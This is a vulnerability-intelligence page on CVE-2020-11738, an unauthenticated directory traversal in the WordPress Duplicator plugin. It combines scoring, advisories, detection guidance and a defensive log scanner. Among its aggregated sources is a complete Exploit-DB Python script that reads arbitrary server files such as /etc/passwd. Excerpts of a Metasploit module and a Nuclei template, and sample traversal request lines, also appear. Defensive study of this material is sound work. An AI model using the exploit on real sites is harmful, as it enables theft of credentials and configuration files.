CVE-2020-11738
Published 2020-04-13
Priority: P1 · 86 · high · CVSS 3.1: 7.5
CVSS 3.1 vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CISA Known Exploited Vulnerability, remediation due 2022-05-03
Exploited in the wild
EPSS: 97.82% (99.9th percentile)
The Snap Creek Duplicator plugin before 1.3.28 for WordPress (and Duplicator Pro before 3.8.7.1) allows Directory Traversal via ../ in the file parameter to duplicator_download or duplicator_init.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| awesomemotive | duplicator | < 1.3.28 | 1.3.28 |
| awesomemotive | duplicator | < 3.8.7.1 | 3.8.7.1 |
Detection & IOCs (extracted from sources)
- Look for unauthenticated GET requests to /wp-admin/admin-ajax.php with action=duplicator_download or action=duplicator_init and a 'file' parameter containing directory traversal sequences (../ or URL-encoded %2F..%2F).
- Flag requests where the 'file' parameter contains multiple '../' sequences (e.g. 11 levels deep: '../../../../../../../../..') targeting sensitive files such as /etc/passwd or wp-config.php.
- This vulnerability was actively exploited in the wild at the time of discovery; treat any matching traffic as a high-priority incident. The vulnerability is present only in Duplicator versions 1.3.24 and 1.3.26 (not in 1.3.22 and before).
- The vulnerability is version-specific: only Duplicator 1.3.24 and 1.3.26 are affected. Versions 1.3.22 and earlier are NOT vulnerable, and versions 1.3.28+ (Pro: 3.8.7.1+) are patched. Tune detections to avoid false positives on patched or older unaffected installs.
- Exploitation requires no authentication (unauthenticated arbitrary file read), so blocking based on the presence of an authenticated session is not a viable mitigation or detection filter.
- Both the free 'Duplicator' and 'Duplicator Pro' plugins are affected (Pro before 3.8.7.1). Ensure detection and patching coverage includes both plugin variants.
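The detection notes above can be turned into a small log scanner. The following is an added example written for this page, not code from any of the sources listed here: it parses combined-format web server log lines (constructed sample lines, not real traffic), flags admin-ajax.php requests whose action is duplicator_download or duplicator_init and whose 'file' parameter still contains '../' after repeated URL-decoding (so %2F and double-encoded %252F variants are caught), and reports the traversal depth and whether a sensitive target such as wp-config.php or /etc/passwd was requested. It also includes the base-directory check a safe download handler must perform; the backup directory path used there is a hypothetical placeholder, not the plugin's real path.

```python
import posixpath
import re
from urllib.parse import unquote, urlsplit

VULN_ACTIONS = {"duplicator_download", "duplicator_init"}
SENSITIVE_SUFFIXES = ("wp-config.php", "etc/passwd")
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")
# Combined log format: client ident user [time] "METHOD target proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Constructed sample lines (not real traffic). The first request uses the nine-level
# "../" prefix seen in the public PoC; the second URL-encodes the slashes and goes
# eleven levels deep for wp-config.php, as the detection notes describe.
SAMPLE_LOG = "\n".join([
    '203.0.113.5 - - [13/Apr/2020:10:01:02 +0000] "GET /wp-admin/admin-ajax.php'
    '?action=duplicator_download&file=' + "../" * 9 + 'etc/passwd HTTP/1.1" 200 1842 "-" "curl/7.68.0"',
    '203.0.113.5 - - [13/Apr/2020:10:01:05 +0000] "GET /wp-admin/admin-ajax.php'
    '?action=duplicator_init&file=' + "..%2F" * 11 + 'wp-config.php HTTP/1.1" 200 3120 "-" "python-requests/2.23.0"',
    '198.51.100.7 - - [13/Apr/2020:10:02:11 +0000] "GET /wp-admin/admin-ajax.php'
    '?action=duplicator_download&file=installer.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.8 - - [13/Apr/2020:10:03:00 +0000] "GET /wp-admin/admin-ajax.php'
    '?action=heartbeat HTTP/1.1" 200 64 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [13/Apr/2020:10:04:00 +0000] "GET /index.php?p=../../etc/passwd HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
])


def fully_decode(value, max_rounds=3):
    """Percent-decode until the string stops changing, so %2F and %252F both become '/'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def raw_query_params(query):
    """Split a query string WITHOUT decoding the values, so encoding tricks stay visible."""
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if key:
            params.setdefault(fully_decode(key), value)
    return params


def classify_request(target):
    """Return a finding for a request matching the CVE-2020-11738 pattern, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    params = raw_query_params(parts.query)
    action = fully_decode(params.get("action", ""))
    if action not in VULN_ACTIONS:
        return None
    raw_file = params.get("file", "")
    decoded = fully_decode(raw_file)
    depth = len(TRAVERSAL_RE.findall(decoded))
    if depth == 0:
        return None  # a plain file name is the plugin's legitimate use of these actions
    return {
        "action": action,
        "file": decoded,
        "depth": depth,
        "encoded": raw_file != decoded,
        "sensitive": decoded.lower().endswith(SENSITIVE_SUFFIXES),
    }


def scan_log(text):
    """Run classify_request over every parseable log line; return the list of findings."""
    findings = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue
        finding = classify_request(match.group("target"))
        if finding:
            finding.update(ip=match.group("ip"), time=match.group("ts"), status=int(match.group("status")))
            findings.append(finding)
    return findings


def resolves_outside(base_dir, requested):
    """True if base_dir/requested, after '..' normalisation, leaves base_dir.

    This is the check a download handler must make before opening the path; an absolute
    'requested' value is rejected too, because posixpath.join discards base_dir for it."""
    base = posixpath.normpath(base_dir)
    candidate = posixpath.normpath(posixpath.join(base, fully_decode(requested)))
    return candidate != base and not candidate.startswith(base + "/")


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ip']} {hit['action']} depth={hit['depth']} encoded={hit['encoded']} "
              f"sensitive={hit['sensitive']} -> {hit['file']}")
    # Hypothetical backup directory, used only to show the containment check.
    print(resolves_outside("/var/www/html/wp-content/backups-dup-lite", "../" * 9 + "etc/passwd"))
```

The scanner cannot tell which Duplicator version a site runs, so every hit on a patched or pre-1.3.24 install is a probe rather than a compromise; confirm the installed version before escalating, as the version-specific note above advises. Decoding the 'file' value repeatedly rather than once is what keeps %252F variants from slipping past a single-pass filter.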
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 7.5 | HIGH | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
| nvd | v3.0 | 7.5 | HIGH | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
| nvd | v2.0 | 5.0 | MEDIUM | AV:N/AC:L/Au:N/C:P/I:N/A:N |
| vulncheck | | 7.5 | HIGH | |
| cisa | | 7.5 | HIGH | |
GHSA
GHSA-wfr8-hp36-c4v2 (ghsa_unreviewed · 2022-05-24) · CVE-2020-11738 [MEDIUM] CWE-22
The Snap Creek Duplicator plugin before 1.3.28 for WordPress (and Duplicator Pro before 3.8.7.1) allows Directory Traversal via ../ in the file parameter to duplicator_download or duplicator_init.
VulnCheck
WordPress Snap Creek Duplicator Plugin File Download Vulnerability (vulncheck · 2020 · CVSS 7.5) · CVE-2020-11738 [HIGH] CWE-22
WordPress Snap Creek Duplicator plugin contains a file download vulnerability when an administrator creates a new copy of their site that allows an attacker to download the generated files from their WordPress dashboard. This vulnerability affects Duplicator and Duplicator Pro.
Affected: WordPress Snap Creek Duplicator Plugin
Required Action: Apply updates per vendor instructions.
Exploitation References: https://unit42.paloaltonetworks.com/network-attack-trends-winter-2020/; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-22&host_type=src&vulnerability=cve-2020-11738; https://dashboard.shadowserve
CISA
WordPress Snap Creek Duplicator Plugin File Download Vulnerability (cisa · 2021-11-03 · CVSS 7.5) · CVE-2020-11738 [HIGH] CWE-22
Affected: WordPress Snap Creek Duplicator Plugin
WordPress Snap Creek Duplicator plugin contains a file download vulnerability when an administrator creates a new copy of their site that allows an attacker to download the generated files from their WordPress dashboard. This vulnerability affects Duplicator and Duplicator Pro.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2020-11738
Remediation Due Date: 2022-05-03
No detection rules found.
Exploit-DB
Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read (exploitdb · 2021-10-18 · CVSS 7.5) · CVE-2020-11738 [HIGH]
---
```python
# Exploit Title: Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read
# Date: October 16, 2021
# Exploit Author: nam3lum
# Vendor Homepage: https://wordpress.org/plugins/duplicator/
# Software Link: https://downloads.wordpress.org/plugin/duplicator.1.3.26.zip
# Version: 1.3.26
# Tested on: Ubuntu 16.04
# CVE : CVE-2020-11738

import sys

import requests

if len(sys.argv) != 3:
    print("Exploit made by nam3lum.")
    print("Usage: CVE-2020-11738.py http://192.168.168.167 /etc/passwd")
    sys.exit()

arg = sys.argv[1]   # base URL of the target site
file = sys.argv[2]  # absolute path of the file to read, e.g. /etc/passwd

# The unauthenticated admin-ajax action passes the file parameter through unvalidated,
# so the traversal prefix is what reaches outside the plugin's directory.
URL = arg + "/wp-admin/admin-ajax.php?action=duplicator_download&file=../../../../../../../../.." + file

output = requests.get(url=URL)
print(output.text)
```
Exploit-DB
Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read (Metasploit) (exploitdb · 2020-12-18)
---
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule 'WordPress Duplicator File Read Vulnerability',
  'Description' => %q{
    This module exploits an unauthenticated directory traversal vulnerability in
    WordPress plugin 'Duplicator' plugin version 1.3.24-1.3.26, allowing arbitrary
    file read with the web server privileges. This vulnerability was being actively
    exploited when it was discovered.
  },
  'References' =>
    [
      ['CVE', '2020-11738'],
      ['WPVDB', '10078'],
      ['URL', 'https://snapcreek.com/duplicator/docs/changelog']
    ],
  'Author' =>
    [
      'Ramuel Gall', # Vulnerability discovery
      'Hoa Nguyen - SunCSR Team'
```
Nuclei
WordPress Duplicator 1.3.24 & 1.3.26 - Local File Inclusion (nuclei · CVSS 7.5) · CVE-2020-11738 [HIGH]
WordPress Duplicator 1.3.24 & 1.3.26 are vulnerable to local file inclusion vulnerabilities that could allow attackers to download arbitrary files, such as the wp-config.php file. According to the vendor, the vulnerability was only in two versions, v1.3.24 and v1.3.26; the vulnerability wasn't present in versions 1.3.22 and before.
Template:
```yaml
id: CVE-2020-11738

info:
  name: WordPress Duplicator 1.3.24 & 1.3.26 - Local File Inclusion
  author: dwisiswant0
  severity: high
  description: |
    WordPress Duplicator 1.3.24 & 1.3.26 are vulnerable to local file inclusion vulnerabilities that could allow attackers to download arbitrary files, such as the wp-config.php file. According to the vendor, the vulnerability was only in two
    versions v1.3
```
Metasploit
WordPress Duplicator File Read Vulnerability (metasploit)
This module exploits an unauthenticated directory traversal vulnerability in WordPress plugin 'Duplicator' version 1.3.24-1.3.26, allowing arbitrary file read with the web server privileges. This vulnerability was being actively exploited when it was discovered.
Qualys
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR | Qualys (blogs_qualys · 2022-02-23)
#### Table of Contents
- Situation
- Directive Scope
- CISA Catalog of Known Exploited Vulnerabilities
- Detect CISA Vulnerabilities Using Qualys VMDR
- CISA Exploited RTI
- Detailed Operational Dashboard
- Remediation
- Federal Enterprises and Agencies Can Act Now
- Summary
- Getting Started
CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively.
## Situation
Last November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a Binding Operational Directiv
Unit42
Network Attack Trends: Internet of Threats (November 2020-January 2021)
blogs_unit42·2021-04-12·CVSS 7.5
CVE-2020-28188 [HIGH] Network Attack Trends: Internet of Threats (November 2020-January 2021)
# Executive Summary
Unit 42 researchers analyzed network attack trends over Winter 2020 and discovered many interesting exploits in the wild. During the period of Nov. 2020 to Jan. 2021, the majority of the attacks we observed were classified as critical (75%), compared to the 50.4% we reported in the fall of 2020. Several newly observed exploits, including CVE-2020-28188, CVE-2020-17519, and CVE-2020-29227, have emerged and were continuously being exploited in the wild as of late 2020 to early 2021.
This blog provides details of the newly observed exploits as well as a dive deep into the exploitation analysis, vendor analysis, attack origin, and attack category distribution.
Palo Alto Networks Next-Generation Firewall customers are protected from these attacks with the URL Filtering an
Unit42 (same article, second entry)
Network Attack Trends: Internet of Threats (November 2020-January 2021), Threat Research Center · Trend Reports · Vulnerabilities
Authors: Lei Xu, Yue Guan, Vaibhav Singhal
Published: April 12, 2021
Tags: Malware, Trend Reports, Vulnerabilities, Botnet, DDoS, Exploit kit, IoT, Network security trends
References
- http://packetstormsecurity.com/files/160621/WordPress-Duplicator-1.3.26-Directory-Traversal-File-Read.html
- http://packetstormsecurity.com/files/164533/WordPress-Duplicator-1.3.26-Arbitrary-File-Read.html
- https://cwe.mitre.org/data/definitions/23.html
- https://snapcreek.com/duplicator/docs/changelog/?lite
- https://www.wordfence.com/blog/2020/02/active-attack-on-recently-patched-duplicator-plugin-vulnerability-affects-over-1-million-sites/
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-11738
Timeline
- 2020-04-13: Published
- 2021-11-03: Added to CISA KEV
- Exploited in the wild